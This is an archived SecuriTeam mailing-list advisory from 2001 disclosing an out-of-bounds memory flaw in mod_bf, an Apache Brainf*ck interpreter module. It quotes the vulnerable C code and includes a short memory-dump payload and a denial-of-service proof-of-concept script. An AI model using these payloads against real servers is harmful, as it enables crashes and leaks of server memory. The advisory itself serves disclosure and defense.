[UNIX] Apache's mod_bf Vulnerable to a Buffer Overflow and DoS

From: support@securiteam.com
Date: 12/25/01


From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 25 Dec 2001 22:08:37 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Apache's mod_bf Vulnerable to a Buffer Overflow and DoS
------------------------------------------------------------------------

SUMMARY

 <http://sourceforge.net/projects/modbf/> mod_bf is a brainf*ck
interpreter that interprets .bf files on Apache webserver machines
(Brainf*ck is very simple, low-level language that allows creation of fast
running code snippets). A security vulnerability in the product allows
remote attackers to execute arbitrary commands by overflowing an internal
buffer.

DETAILS

Vulnerable systems:
mod_bf version 0.1 under FreeBSD ports
mod_bf version 0.2

Relevant code fragment from mod_bf.c:
  #define ARR_SIZE 100

  static char a[ARR_SIZE];
  static int p;

    ...

  static int bf_handler(request_rec *r)
  {
    ...

      memset (a, 0, ARR_SIZE);
      p = 0;

    ...

      if (!r->header_only)
        interpret (c);

    ...

  }

  static void interpret(char *c)
  {
      int b;
      char *d;
  
      for (; *c; c++) {
        switch (*c) {
        case DEBUG_PR:
          for (b = 0; b < 10; b++)
            ap_rprintf (req, "a[%d]: %d" CRLF, b, a[b]);
          ap_rprintf (req, "a[p]: %d p: %d" CRLF, a[p], p);
          ap_rflush (req);
          ap_reset_timeout (req);
          break;
        case '+':
          a[p]++;
          break;
        case '-':
          a[p]--;
          break;
        case '>':
          p++;
          break;
        case '<':
          p--;
          break;
        case '.':
          if (ap_rputc (a[p], req) == EOF)
            return;
          ap_rflush (req);
          ap_reset_timeout (req);
          break;
        case ',':
          if ((a[p] = *req->args) == EOF || a[p] == CR)
            a[p] = 0;
          req->args++;
          ap_reset_timeout (req);
          break;
        case '[':
          /* the idea of the following is borrowed from bfi */
          d = ++c;
          for (b = 1; b && *c; c++)
            b += (*c == '[' ? 1 : (*c == ']' ? -1 : 0));
          if (!b) {
            *--c = 0;
            while (a[p])
              interpret (d);
            *c = ']';
          }
          break;
        }
      }
  }

a[] is an array of 100 tiny bytes. p is an integer index that points out
memory locations. It can be increased with > or decreased with <. The
memory location pointed out by a[p] be modified with + or -.

An attacker can write something that increases p so that p >= 100 or
decrease it so that p becomes negative, allowing him to set the location
pointed out by a[p] to an arbitrary value (by only using the '+' or '-'
signs).

Further, an attacker can dump sensitive memory by using the '.' command:
  <.<.<.<.<.<.<.<.

DoS example:
$ cat > ~GOBBLES/public_html/bad.bf
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>
+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+
>+>+>

ADDITIONAL INFORMATION

The information has been provided by Gobbles.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Buffer Overrun in Windows Help and Support Center Could Lead to System Compromise (MS03-044)
    ... Get your security news from a reliable source. ... A security vulnerability exists in the Help and Support Center function ... *Microsoft Windows Millennium Edition ... An attacker could exploit the vulnerability by constructing a URL that, ...
    (Securiteam)
  • [UNIX] Security Analysis of VTun
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... An attacker can modify ... Packet forwarding: ... password) as encryption key. ...
    (Securiteam)
  • [REVS] Security Considerations for Web-based Applications
    ... Get your security news from a reliable source. ... consequences of this ranges from the erosion of customer confidence in the ... of poorly implemented host naming procedures or web-application URL ... The attacker may choose to inject ...
    (Securiteam)
  • [NT] Windows Media Player Directory Traversal Vulnerability (WMZ)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... When Media Player 7 or 8 is installed, ... As most other Internet Explorer vulnerabilities, ... cannot be guessed by a potential attacker. ...
    (Securiteam)
  • [NT] MHTML vulnerability in Outlook Express
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in Outlook Express allows an attacker to run code of the ... If an attacker were to host a malicious website that contained an MHTML ...
    (Securiteam)